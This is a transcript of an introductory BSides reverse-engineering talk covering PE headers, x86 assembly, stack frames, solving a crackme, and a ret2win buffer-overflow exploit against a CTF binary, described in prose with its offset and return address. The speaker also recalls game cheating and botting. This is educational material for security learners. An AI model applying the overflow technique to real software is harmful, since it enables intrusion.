Getting Started in Reverse Engineering

Name: Getting Started in Reverse Engineering
Uploaded: 2023-05-28
Duration: 45 min 29 s
Description: An introduction to reverse engineering fundamentals using hands-on analysis of executable files. The talk covers executable formats, linking and loading, x86 assembly basics, stack frames, and practical techniques like string analysis and exploit development, preparing participants for malware analy

BSides Knoxville · 202345:29461 viewsPublished 2023-05Watch on YouTube ↗

Speakers

Marc Messer

Tags

CategoryTechnical

TopicCTF Malware Analysis Reverse Engineering

DifficultyIntro

StyleTalk

Mentioned in this talk

Tools used

GDB Ghidra

Frameworks

Pwntools

About this talk

An introduction to reverse engineering fundamentals using hands-on analysis of executable files. The talk covers executable formats, linking and loading, x86 assembly basics, stack frames, and practical techniques like string analysis and exploit development, preparing participants for malware analysis, CTF challenges, and vulnerability research.

Show original YouTube description

Spend an hour learning how to analyze executable files for fun and profit. This helps lead into low-level computing, computer architecture, and operating concepts in a hands-on fashion. With a bit of knowledge, you can get started on malware analysis, reverse engineering CTF tasks, vuln research, and more. In this talk I will briefly introduce some fundamental RE concepts and how they relate: - Going from source code to executable to process - Executable formats and sections - Linking and loading - String analysis - Basics of reading x86 - Basics of stack frames - Basic instruction pointer overflow exploit

Show transcript [en]

everybody give it up for Mark yes sir

okay um can everybody hear me okay sweet okay um I'll go ahead and get started then um so my name is Mark Messer uh I'm local to Knoxville so I'm super excited to speak to everybody here I used to live like right up the road by Fulton so that's that's how local I am actually um and yeah reverse engineering is a really self-indulgent uh tedious process and I'm thrilled to have a room of people who want to listen to hear me talk about it for a bit so um I don't really have that much of an introduction for myself because kind of the less I talk about work the more fun I can have talking about this but I work in the

defense space primarily in incident response um it's fun we get to see some some novel malware and it puts you in a situation where it's actually useful to have some reverse engineering skills on hand where a lot of times that's sort of fiscally irresponsible you might say um so yeah we'll go ahead and get into it and then um I made a lot of Art and illustrations for this I've been working on this for a while so I'm really excited to present here to you guys um so at a high level what's reverse engineering you know forward engineering is what we normally do where we we have some kind of need for for a thing we go

ahead and we write it we make something and then we have our output and reverse engineering we we don't have all of that information typically we may not have any source code we may just have like a binary you may just see network traffic you may see whatever you know within this I'm mostly going to be talking about just binaries and like um windows executables but we'll get into all that so if we have this binary and we don't have any source code then how are we going to try and learn more about it you know there's the obvious thing of like running it and seeing what happens if we suspect it's malware or something that

might be in a virtual machine or some sort of environment that's designed for us to you know see if it drops a file or opens up network connections something like that you also may do static analysis where you're really just looking at the object itself and seeing what you can sort of give in about its process or properties without even running it so then what's the output like why do we even do any of this for a lot of stuff it's because you want to write Yara when I first got into it it was because I was working on working I was I was a teenager and I was interested cheating in games because I'm

terrible at them but I still like winning um I don't do that as much anymore but extracting Intel you might want to learn about your adversaries you might want to um you might have a product that's EOL or something and I don't know if that's legal or not necessarily but you might need to learn more about it so you can continue keeping it around if you absolutely have to I'm learning to write better malware if you're interested in writing better malware going and looking at a lot of malware is a great way to go about that DRM removal software cracking that kind of stuff I should warn I guess at this point too if you're like a like a really

big evangelist of um DRM software and like terms of service and stuff then there's a really good talk across the way that will probably borrow you or bother you a lot less so then another thing of note for this is um due to the tedium it's it's sort of like ctfing if anyone played in any capture the flag events you know ctfs can be very frustrating because you might just get an image or something you don't know if you're supposed to use that for osin you don't know if it's like a layered PNG or something and you have to extract a flag from it you know you just have an image and you're told like get me a flag

um that can be just a really overwhelming process and really frustrating and you feel like you fail and so I think there's a few things that you can do to try and make that a little bit easier um so taking what you know and using that to allow yourself to ask questions about what you don't know a lot of times if we're working on an engagement or something we call that like pivoting like we we can say okay we notice this traffic we're going to utilize that see what else we can learn about what's going on um I would say too and this is really helpful for software development as well anything that seems initially

complicated you probably just have to break it into smaller less complicated steps sort of like um sort of like taking like a really complex algorithm or really difficult math problem or something like that you know how do you make it digestible and something that you can actually approach and then failure is something that you just have to be super comfortable with um I would say I'm sort of like the Michael Jordan of failure in a lot of ways in in that you can always learn something out of that failure and just reapproach it and and go again and see what you can do because most of the time if you're just trying to figure out how

something works you know he started out not knowing how it works so it can't it can't get any worse um that's maybe not a good mindset but that's how I think about it but anyhow so so to jump into this we're going to go into a few technical terms and really what I'm hoping to do here is say hey you know there's all these sort of prerequisite topics that you need to to be comfortable saying I might not know everything about this but how do I take enough information of what I do know to start approaching you know the environment in which a processor executable runs um the structure of of that binary itself and then understanding some of

the instructions that are running to to the point where we're essentially looking at a mechanical process at a certain point right when we get down to sort of the electrical engineering aspects of it and we're not really going to go too far into the weeds of that but just know like we're going to introduce a lot of Concepts to show where they matter within the reverse engineering context and it's okay to feel like you still don't understand a lot of stuff because I feel like that every day in reverse engineering is like my daily job um so here we're going to talk about forward engineering really quick so we've got source code on the left

hey look at that we've got source code on the left right over here and we're just doing like a really simple C Hello World um and we know that eventually we have an executable which if we looked at it in a hex editor we would just see like hex output gibberish right um for those of you who've looked at executable executables before like you might immediately notice like oh this is a PE file like a like a Windows dll or a Windows exe something like that and in between we have the compiling process and we have linking um so this is important for us to note because a lot of times when people are trying to reverse engineer stuff you're

just going to look at like decompiling something like that which is a bit of a misnomer right because you you can't really decompile something per se it's been compiled but you are wanting to learn how you can understand that compiled output and maybe think of it in like a c like fashion where we we have sort of a pseudo code for apps that that looks like this depending on your goals so once something is compiled say with like GCC or something like that we have this compiled code output that starts to look a little bit more um obtuse is maybe the way to say it so we have we have some instructions that if you've never looked at assembly

before they probably look pretty foreign and if you have looked at assembly before um they still probably look pretty foreign and that's okay um you know we've got some instructions here that we'll talk a little bit about later but right now just don't even sweat it although one thing to note is how many different instructions do we really see here like I I can't count that high so I guess like five or six something like that and we see them kind of repeated so really there's not that much to memorize if you think about it um but so after we have that compiled output we have something called linking and linking is really important because

a lot of times our code isn't necessarily just the code we wrote for example in in this source code right here we have printf hello world and then we you know return to whatever um it's main so I guess it exits the program so that printf for example is not code that we we wrote in there we didn't specify how printf works like we didn't have to go write custom code to go and output something to the console which is what that's doing somewhere in the machine that is referenced and and pulled in so that when we run this executable um it's it's executing this code that we did not use that we symbolically reference with printf so printf is

therefore called a symbol you'll hear uh you'll hear me call that um term out several times and then the the aspect of making that code accessible that we did not write is called linking and so in this context it's going to be talking about um you know like external dlls or something like that that we're not Reinventing the wheel we're not writing our own custom thing you know we're just we're just printing that out um so hex code let's talk a little bit about hex code and why we're using it uh most of you may know this some of you may not but hex we're just talking about something in base 16 that allows us to

shorten things so um as we represent them in sort of binary um methods so so looking at base 10 for example the value 1000 we can see that takes four characters for us to represent and then if we look at the value 1000 in binary it takes a little bit more to represent and unless you're just like a super genius you're not going to look at that binary sequence and be like oh that's a thousand of course some people may be able to do that I definitely am not and then if you're really really sharp you might look at that hex 3e8 and immediately recognize that that's a thousand but why do we really have it

represented that way it's because it's just easier for us to shorten our representations of this information it's also easier for us to read as bytes you know if you combined down here you know these two um whoops these two you know sections 45a and the 9000 you know that's that's a byte so it's it's super easy to just represent everything that way and parse through it and understand what we're looking at um and what does it represent in this context a lot of times it's opcodes so if you think about the actual circuitry on a circuit calling out specific things like moving something from one register to another is going to be like a literal op code

that's you know a capability of the chip um so b805 for example in this which I have over here on the right would be moving to the eax register the value five and the eax register think of that as like a variable space that's just baked onto the chip like it's physically holding those bits um data we'll see some data in there as well just strings of text other values that you parse out from from hex that kind of thing so a little code in getting us a bunch of output before we dive into more of the sort of fun stuff um one of the weird aspects that it took me a bit to understand is like why why

does something like print hello world spit out this like huge assortment of binary you know understanding that you have to have you know stuff linked in and make it run that's still odd um so just note that like a lot of what you see in binaries is actually just meta information that is there so that the binary can be loaded in to the operating system executed and um then you'll be running whatever you want so that said there's a bunch of headers that are in binaries we're going to talk about that that's an important aspect of looking at them and then you'll have different sections within the binary that different different parts of your code are going to be in there so for

example in the hello world you know we had the string of text hello world that's not executing code that's that's a data section so there's going to be a section that literally just holds read-only data and that would be going there and the rest of your code would be in like a different section of the binary the way I think of this is sort of an analogy to books which I have on here of course um if you pick up a book you don't just like flip to the first page and then start reading it and you know wonder who this copyright character is and who the Library of Congress is you're going to know like oh

okay I have to go to a table of contents I'm going to go to whatever and that's where I start and the operating system essentially needs all that type of information too you're also going to have meta information in a book you would have like appendices or something like that think of that like our data sections or relocation tables stuff like that that's that's all going to be an aspect of it so let's talk about portable executable files specifically so um so those are going to be windows executables so most of the time when you see something like that you're going to think like oh I have a exe you know I want to play a steam game or whatever I

run the exe that runs the program you'll also see dlls they're actually PE files as well and each of these follows a predictable structure because the operating system needs to be able to like pull that into memory and run it obviously so we will actually go and look at a binary in a minute but that structure you know we have in something called the MZ header which is there because Windows basically says hey if you try to run this on MS-DOS we don't want it to just kill the system we want this to just spit out of things saying you can't run this on dos and then move on so there's actually a Dos program baked into the

front of every single PE just in case you try to run it because Windows is really really dedicated to ensuring backwards compatibility for things that shouldn't exist but um I don't know we're not going to go down that route that's that's the whole talk um so then let's talk a little bit about sections that we're going to see when we look at these so I've already mentioned a little bit about that but so we'll see like a DOT text section that's where our executable code is we'll see a DOT data section that's where our you know writable data typically is um read-only data our data stuff like that and and really don't feel like you

have to memorize all this stuff I'm constantly referencing documentation um all day like I have books on my desk I have usually a window open with something you know all sorts of stuff so um really it all just kind of comes with familiarity so let's look at an actual PE file headers in here I think this is actually is this legible to people out there thumbs up thumbs down okay cool yeah I wasn't sure what to expect so that's a happy circumstance but um so if we look in here you can see that we have some some bytes that I've called out in certain different colors right and that's because if we're looking at just a raw hex dump of some

of this information then we can tell like oh this this byte over here is referencing that this is a PE file so that when Windows tries to load it it's going to know how to treat that file we'll see um you know let's go see down here we can see the image base that the the code is loaded into and from there we calculate certain things called file offsets in the sense that like we know that this is going to be mapped at some location into memory and that if we take that location that it's mapped into we can see something like the base of code ox1000 right there and we can know that um you

know a thousand bytes or whatever that represents into the code from whatever that base base location is we can see the beginning of our code so some of this is saying hey you know from wherever this is loaded into memory you count out this many bytes or or you know what have you and therefore you can find certain things um so I think we might even be able to see the address of the code entry point right here and again that's just a that's just a raw thing you can see in the hex dumps so a good way of going into this kind of thing really to familiarize yourself is is in some ways just opening something up in a hex

editor looking at it and seeing what you can figure out which is coincidentally what we are about to do right now so for this I'm just going to pull up a hex editor I'm trying to make all this stuff um concept focused and not really tool focused because like if you're if you want to ask the right questions that matters a lot more than like which hex editor are you doing it in it doesn't it doesn't really matter they they display hex you can go look at it cool what else do you need um and then just referencing whatever you need to so here we have a binary that's from ophir harpaz I've linked to

her Twitter later in here but she wrote a site called begin.re that I think was pretty helpful and she had some really nice binaries for beginning to get into analysis so let's take a look at this let's say what we think it's maybe doing and we'll see if we think that we could crack it so here is something called um o10 hex editor okay that doesn't really make much more space but that's fine um so here we can see that we have certain certain header sections called out and just highlighted so here for instance is that MZ header for in case this is loaded into like a Dos machine and then you can even see below that this program

cannot be run in DOS mode and like this this is a full program like if you just cut it out and you run it in a Dos machine it would work and in fact what's kind of funny is you can just change like because it's a hex editor and we can't edit this we could just go change that text and have it say whatever we want um it wouldn't really do much for us but that is a possibility but so let's go ahead and take a look and see what sections we have so we see we have a text section we have our data section so again that's our read-only data section we have a data section we have resources

we have relocations so going through and looking in here we can see you know our text is just going to be assembly op codes but let's go ahead and look at our read-only data and see what we can find so in here we've started to see string data that hopefully you guys can see from right here but it's it's just asking us you know hey enter a password and then it has this um very suspicious lead speak crack me in there who knows what that's for and then it either says correct or wrong password so without knowing hardly anything about this binary I think pretty much everyone in this room could just guess like hey you

enter in some kind of value you compare it to some other value and then you either get a yes or a no and right now I'm pretty sure if we were to just run this executable which we can't because I'm on a Mac and it's an EXE um we would be able to most likely solve this crack me and a lot of a lot of things you look at just going and identifying strings and like the read-only section like if you just pull up your average run-of-the-mill ransomware sample um not to I guess endorse people doing that willy-nilly necessarily but if you did and you just wanted to go and find the ransom note you'll probably see it

just in plain text because whatever whatever method they use to get it onto your system was probably how they worried about hiding it um as you know anything that goes and encrypts everything on your drive is is kind of screaming alarm Bells at that point but anyhow let's go ahead and jump back to the presentation and we're making great time by the way y'all this is fantastic so um please don't run for the doors but we're going to talk about assembly for a little bit and uh hopefully they've chained them by now so people can't escape but we're going to talk about assembly for just a little bit and it's not going to be nearly as bad as it

might have been in college or if you guys are weirdos and learn this for fun um we're basically going to talk about why this looks cool I don't know if anyone remembers in school in like every math class ever they're the people who are just like oh why do we have to learn you know this what how is this ever going to be useful and it's usually like algebra or something where you're like why are you asking this this is applicable to everything but um there's always people like that and I I wish that I would have had teachers who were like hey here is why this is interesting like here's why we should care because that's

sort of part of the point of this it's like why should we ever care about assembly because you can do cool things with it that's frankly the answer um and if you have like a like a violent hatred of dependencies then you will love assembly because you aren't dependent on anything um so assembly what is it um op codes we're going to think of those as individual circuits on the CPU just to just to footstop that again you know like a literal circuit path that is doing a thing it's going to have an OP code syntax is usually kind of odd when you think about it before you realize about op codes so you'll have like the

instruction name like move a value and then you'll have the destination it's supposed to go to like a register such as eax and then you'll have your source operand which is let's say the number five like we had on our first thing of you know moving the value to five to eax why we say it that way is because move something to eax register is a literal circuit so it makes more sense to represent it that way um certain Disturbed individuals prefer at T syntax which is um essentially saying like the the opposite saying like you know move the value 5 into eax and that's fine but um don't don't don't ever do that nobody

likes that um so registers we're going to think of registers as values uh variables again that we've got just baked onto the chip right and there's stuff like micro code too so like this this all goes down huge rabbit holes but um I'm going for Concepts more than I'm going for like hard accuracy so those registers in 32-bit assembly you have eax for example we'll talk about what that's for and it's 32 bits wide holds a 32-bit value because we're talking about 32-bit assembly and if you're using 32 bits of memory space and you pass it a 128-bit value then um in technical terms everything gets broken so we are going to just talk about

things in 32-bit space some of these can be shortened into smaller registers for example um if you were just using 16-bit you would have ax and if you just wanted to ensure that a value stayed in the 16-bit register even in 32-bit assembly you could pass it something like ax we also have some indices and pointers for the sake of time we're just going to talk about the pointers so ESP for example and EBP maintain our position on the stack and everything on a computer that runs is essentially recursive so you have when you when you turn something on like a your computer or whatever and you then open up a new process that process was opened by

something else like there's no there's no Island process that just doesn't have something that started it um so therefore we're sort of just going to recursively call things through the stack and work our way back and again that's all nebulous I've done a very confusing illustration and we'll get to that sometime soon as well so let's talk a little bit more about those registers and some of our flags and pointers stuff like that so eax think of this as I just think of it as the accumulator register because of the a frankly just makes it easier stands for extended that's the e in all of these so we're often going to use that to store like return values after a

function um the base register often holds function parameters index addresses that kind of thing ECX if you've ever written any code you know think of that as your counter you might have a variable called I for iterations or whatever that you use all the time edx you know whatever passive data and a lot of what I'm writing about function is really just dependent on how like compilers behave because um that's they sort of have intended functions but it's just a part of a machine and you can really use it for anything if you're just writing assembly but um there's also flags and flags are really important because you aren't usually directly changing a flag or seeing a flag directly change in

my opinion like you don't necessarily see something like a zero flag just like move the value one into zero flag you usually have something like a comparison that goes and changes these flags so so think about stuff like Boolean types where you want to know if something is true or false or you want to do like if or else like I want to do this and if this is set this way then I'm going to do something else instead so if we have a function in assembly functions the wrong term but whatever I'm already going like compare the eax and edx values then if the eax and edx values are equal then it's just going to

stay as zero so that way if you have some kind of comparison later then the the zero flag is checked and if the zero flag is one thing or the other then it may do something like jump so the the next um the next function here is just jump not equal and that's essentially saying okay well this wasn't set to this just like an if else function therefore we're going to jump to this location in memory so 401.54 B in this in this case referencing a memory location so there's a few different flags for checking to see if a result is negative for example we're checking to see if you've overflowed a register or something like

that then those flags get set for that purpose so let's talk about the toughest part of this to learn and really it comes with familiarity it's going to seem confusing it confused me for months and I'm still going to be confused trying to explain it because it's it's pretty detailed and really the best way that I found for just getting familiar with how the um Stacks work and assembly tends to just be I go to YouTube and I just watch people mechanically um you know shift stuff around kind of like powers of Hanoi until it's a little bit easier to understand but so the stack is the last in first out data structure that is

um in more friendly terms think of it like a deck of cards if you are putting something on top of the deck and someone else has to draw from the top of the deck because nobody draws from the bottom of the deck then they're just going to to pull the last thing you put in there so it's it's always going to work like that there's heaps which are different we're not even going to talk about heaps but so at a high level how does the stack work we're going to push our variables onto the stack in reverse order if we need variables for a function that's being called um the something called Epp the base

pointer is then pushed onto the stack next to help us tell where our function begins and know where we are in memory space essentially EBP is then assigned the value of ESP which is the pointer to the top of the stack so at this point they're equivalent because we haven't really done anything with our function and then as we move throughout the Stacks say pushing or pushing or popping values onto it then ESP is going to shift with it um and then after we're done with everything EBP That Base pointer is popped from the stack and we return to the memory location where that function was called and again that's at a high level don't worry too much because we're

going to look at it in detail um so in simple high level terms we save where we came from and then we use our EBP and ESP registers to keep track of what we're doing because you have to have some method for accounting and memory uh once you're working on things at a fairly low level so let's go through this with an example and we'll just talk about this code really quick we are going to essentially start in this example that I run through where we call this extra subtract function and the subtract function is just defined as taking two integers creating a space to store an output and then we are going to subtract one from the other and return

that saved output so um pretty simple right there and now let's make it really confusing by looking at it in assembly so here we have the scene set for a function you're going to notice right here push EBP move EBP ESP if you if you ever have to look at assembly and you just remember one thing from this talk every single time you see that a new function is being called because that's setting the scene for a function to be called so here I have a memory stack that I've I've written and I just have this in in in four byte increments sort of uh decreasing and increasing so I like to think of the stack as counting down

because I think it's easier to illustrate if you watch videos of people doing like stack mechanics stuff A lot of times they do it the other way but um whatever is easiest for you to understand I think is the way to do it so let's let's go to where our function is calling again that subtract function and so we need to push those variables onto the stack right so we're pushing our variables onto the stack and then they are showing up in the stack right here we're pushing five for integer a we're pushing 10 for integer B and every single time we push our our EBP is rising a little bit and so then we call subtract so that pushes the

return address of the function that called this and then it jumps to the function address of the the subtract function so let's pretend we've just jumped over to there and we're going to push EBP move EBP and ESP um setting up our pointers that we can begin so we have those um we have those variables onto the stack and we we pushed EBP and we moved DBS EBP and ESP so let's say that now we want to add some registers to hold integer a and to hold integer B um this is not necessarily a guaranteed 100 again copy of how a compiler works but at a simple level I think it's in just an easy way to understand it so we're

saying okay we want some memory space to hold those values so we're just going to push them onto the stack and each time we do that that's going to automatically move ESP because assembly is cool that way so then because we know uh you know hypothetically when we wrote this function that we're pushing it to values of a certain um you know 32-bit space we know that we can basically move these values at a predictable location from our function starting into edx and ECX so that we have those values accounted for so we've um we've loaded those integers that we passed into EBP and edx or pardon me into edx and ECX over here um and so then we're saying okay well I

want to reserve some memories that I can save what we're returning so we're going to subtract 4 bytes from ESP and that just allocates this empty memory space that we can therefore store value in so now we're going to perform that function um again to notice I think I've called this out a couple times but we're not actually you know moving ESP for the most part on our own we're not every single time we push something onto the stack you know we're not saying oh we need to move ESP so we don't lose count the nice thing is that as a function of pushing and popping ESP moves for us but anyhow so here we have our actual

subtraction and we want to subtract ECX from edx so that's our a minus B and then we're we're storing that value in ECX because again every every value has to have a place to go and then simply you can't do something like subtract 5 from 10 because where are you going to store that value again at this point we're talking about like a mechanical device um so then we want to store that value to a location so that we can copy it to eax and return with it so that's what we're doing here we're moving the ECX value into that integer C location where ESP is marking and then we're saving that value into eax because after all of this

is done and we pull all of this off we want a red that value to be able to be referenced by the program otherwise the entire function call was useless so here we're going to clean up and return and it's still probably going to feel somewhat confusing and that's totally okay um so we're going to add four bytes to ESP again this moves up and down here so that's moving it back up we're going to pop ECX we don't need it anymore we're going to pop edx because we don't need that anymore and then we are going to just use the instruction leave which pops our base pointer and then once we return we return to the address that ESP

is pointing to AKA return address right here and that would be us jumping back to main in that original example and therefore having performed our function okay so now we feel super confident about assembly we've learned everything that you learn in you know a master's degree class or whatever um you know I'm sure that's basically all they cover and we're just going to see if we can use that to take a look at that same executable that we looked at previously and in here we're going to go look at it in Ida free um yikes here we're going to close Ida and we are going to restart Ida

excellent and we're back this is how technically proficient I am that was effortless okay so here we have some instructions we can see those um those string values that we were looking at before and so again we're probably just like oh we see like a bunch of different values that we we don't know you know what these do I don't know what these instructions mean whatever um so let's not panic really quick let's look at these instructions and we see okay we see move xor push load executable executable address call that's what like five instructions there's a test and a jump not zero and an ad and so I'm not saying you'll never have to look anything up but what I am

saying is that like the the amount of instructions that you need to actually like eventually learn and understand is not this like insurmountable amount like what looks like gibberish when you realize like oh I actually only need to pay attention to certain aspects of this to get some kind of information out of this that's actionable um it's really not that much so we see here that the string enter password is pushed onto the stack and then we see that a subroutine is called so if we had to guess knowing what we know now that subroutine is probably what's printing that to the screen so we know that if you're going to execute some kind of function you have to push

your variables beforehand and then we see that happen again down here for um for crack me you know we see crack me pushed onto the stack we see the string that would have been entered as string one also pushed onto the stack and so then we see a call for a string comparison so there we know okay this is asking me for a password this is telling me like Okay um I have I have this input I want to compare it and then after that we jump based off of whether or not that worked and so then we can see okay well we jump either to correct or wrong password and we don't even have to run this we

literally know like it's it's comparing whatever we input to crack me and if it's not equal then it goes to wrong password so that's one that's one function and granted things are a lot easier when you have like nice strings kind of telling you what's going on but really to start getting into looking at things like this you don't need a bunch of fancy education like I I literally don't have any reverse engineering training I don't have a computer science degree um I think I still have a valid Security Plus which I should probably check because I might need it for my job but um I do the job too that always shocks me but anyhow

let's go back to our PowerPoint because we have 10 minutes and the cool stuff is just around the corner so um so we're going to do a rock chain because why are we doing why are we doing any of this like what's the point if we're just learning something about something we're like well cool this is how this works see you later you know that's that's there's always a reason it's it's never just um you know this exercise that you're just doing for no reason you always have some kind of output so um so here we're going to talk about a red to win binary and the point of these is that you have a function that's like an

island function maybe it's not referenced anywhere in the binary and you want the program to jump to that function even if running the function just as normal um it would never pop up and that'll make a little bit more sense when we actually look at the assembly and it will make sense because we're all confident and feeling great so with some initial Recon on this binary let's just say that we found some function names like main poem me and Rhett to win and for this too you'll see that I'm using um GDB which is the gnu debugger with a pound debugger installed and pone Tools in Python 2 because Python 3 is really annoying for exploit development

um to put it bluntly like it just it doesn't print to bytes natively and it's irritating so um so yeah let's let's go use some some depreciated software that we're not supposed to use and this is going to be an L file which is a Linux executable why that's noteworthy is because it's going to be little Indian um Indian this is something that we didn't really go into but just think of think of the number I'm here I have 31. we can say that this is um little Indian because the number one doesn't represent 10 like the three does three represents three tens that's bigger than a number one which represents one one so that's the

smallest bit however if we if we were using a computer that had something like 13 being the equivalent to 31 where we were parsing it as like okay the first number is the least significant meaning just the digit one and the next number means the most significant which is the tens that we're summing then we would say that that was big Indian because the largest uh value number would be at the end there but anyhow so let's go ahead and look at our main function again we we see some stuff that's not super exciting we just see um we see a bunch of instructions that maybe we'd have to look up and then we see that we call a

function we call another function we call another function and we jump to that pone me function and then we call another function so these functions by the way we have something setting a buffer uh puts at program linkage link table linkage um is just outputting to the screen it's like printf think of it that way and then we have pone me so let's go look at pone me in pone me you know if this was something that we didn't have to solve anything it would eventually jump to that Rhett to win function and we wouldn't have to worry about any of this but we don't see that it jumps too red to win at all we actually just see that

it sets some memory outputs to the screen a handful of times outputs to the screen again read some input outputs to the screen and returns to Main and so after it returns to main then the function just ends so let's look at that rhet to win function again we didn't find any references to this function so if we just run that binary this this code is never going to run um so we see output to the screen we see a system call here so System Program link table um and then it just ends so let's look at some GDB input this is interesting because you can see your stack values as you step through a

program you can see the actual assembly that's being run or pardon me this is your stack values at the bottom and you can see your registers at the top so this is just us looking at the main function here why do we see shell bin bash because again everything is recursive on a computer that's where we literally ran this from was just from the shell so that's why we see that so we we don't see anything interesting whatever let's just continue running the program so here we jump to pone me and um you know again we don't see that much we can see the instruction pointer here you know pulling our our next instruction that we're going to jump to

and run we can see some stack values whatever we don't see anything that exciting but if we continue running from there then we see that it's going to prompt us for buffer or for input and it says we're going to fit 56 bytes of user input into 32-bit bytes of Stack buffer what could go wrong a lot of you here already probably know but we're gonna see if we can overflow that buffer so here we're just putting in a non-repeating pattern that I just made with uh I believe pound tools and then we just enter that when it asks us for input and we see what we have and here we have a program that crashed so let's

talk about specifically why that crashed because that's why this matters um so we can see invalid address 616161 blah blah blah so we also see that same value in EIP so if we were a budding reverse engineer and we wanted to know why did that crash the program we would look into what EIP is and see that it's an instruction pointer and then we would be like oh okay this this pointed to something that doesn't exist there is there is no 6161c instruction like that's that's why it crashed it reached to that for the next instructions that it can continue running and that was just completely unavailable um so that being said that's what we

know let's create our exploit so one of the important things from that is we know like okay we put value that we wanted to put into EIP so therefore we can influence what that value will do and so what happens if we just stuff the memory location for our rent to win function into the the buffer overflow at the point where um that value is read into EIP so we see in our non-repeating pattern that laaa occurs at the 44th character so we know that that's where we want to input that um that value and then we see if we're looking at the rent to win function it starts at zero eight zero four eight six

two c as the memory location and so we just write a simple little uh buffer overflow exploit in here in Python and we're printing uh 44 A's in a row and then we're feeding it that memory location backwards because it's a little Indian so we have 0804 862c and then when we run that we can see that we get our flag and I wish I could do that live but I think it would be too uh too time intensive unfortunately but so there we've we've stuffed that input in and then it goes to here and then it crashes and why does it crash because like the rest of the stack is just filled with garbage because we did a buffer overflow

if you really wanted to mess around with this you could then figure out okay well how do I make sure it doesn't crash when I do that like how do I replicate what needs to be in there for this to actually return to main or something um that is the end of my presentation um so definitely thank you guys all for being here if you want to learn more about this sort of thing I would recommend following pretty much all of these folks um especially the top two these both of these women have made incredible learning content um if you want to get samples VX underground is good they do require a password so I would message them on

Twitter because there's sort of a meme that the password is infected but really you have to go bug them um if you want to read some books about it if you were going to get only one book off this list POC or GTFO is fantastic um I have a Blog that I guess I could have linked to on here it's 8x86re.com if you follow me on Twitter or add me on LinkedIn or something from the speakers page then it's probably pretty easy to follow there and a friend of mine does a lot of ASCII art so I have them on here too but um yeah I probably didn't leave enough time for questions or anything

but just holler at me I'm not going anywhere so yeah thank you guys so much for listening to me thank you wow that was an excellent talk as somebody who did get a degree and took classes in reverse engineering I will tell you that uh that 45-minute talk did Cover several weeks of an entire semester along course so I'm a bit jealous um yeah uh do we do have time for probably like one or two questions does anybody have anything any hands I do have a question um when uh at the start you said you were reverse engineering some games um because he had some trouble with games where your reverse engineering um so really when I got my start in a

lot of this stuff it was in the context of like griefing with my friends because I was just a angry dumb teenager um so a lot of that was like Day of Defeat Team Fortress original Team Fortress 2 World of Warcraft um really anything like it's sort of like antivirus in a way anti-cheat so like anything with vac we felt pretty comfortable working on valve antichi um World of Warcraft is mostly botting because I was like selling gold in college because I was just a freaking bum but yeah bunch of bunch of sweaty nerd games for sure any questions and see any hands so I'm assuming there are no questions all right one more round of applause for

large [Applause]

Getting Started in Reverse Engineering

Related talks